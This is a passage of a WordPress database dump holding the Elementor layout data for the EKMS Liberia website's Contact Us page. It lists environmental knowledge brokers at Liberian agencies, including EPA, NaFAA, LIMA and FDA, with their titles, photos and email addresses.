href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony A. Yokie<\\/strong><br \\/>Manager<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Martin Killen <\\/strong><br \\/>IT Officer<br \\/>NaFAA<br \\/><a href=\\\"mailto:maskillen@nafaa.gov.lr\\\">maskillen@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23967,3511,'_elementor_edit_mode','builder'),(23968,3511,'_elementor_template_type','wp-page'),(23969,3511,'_elementor_version','3.0.16'),(23970,3511,'_wp_page_template','default'),(23971,3511,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/bgoll.jpg\",\"id\":3426}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll<\\/strong><br \\/>Conservation Manager<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Director <br \\/>MOA <br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"c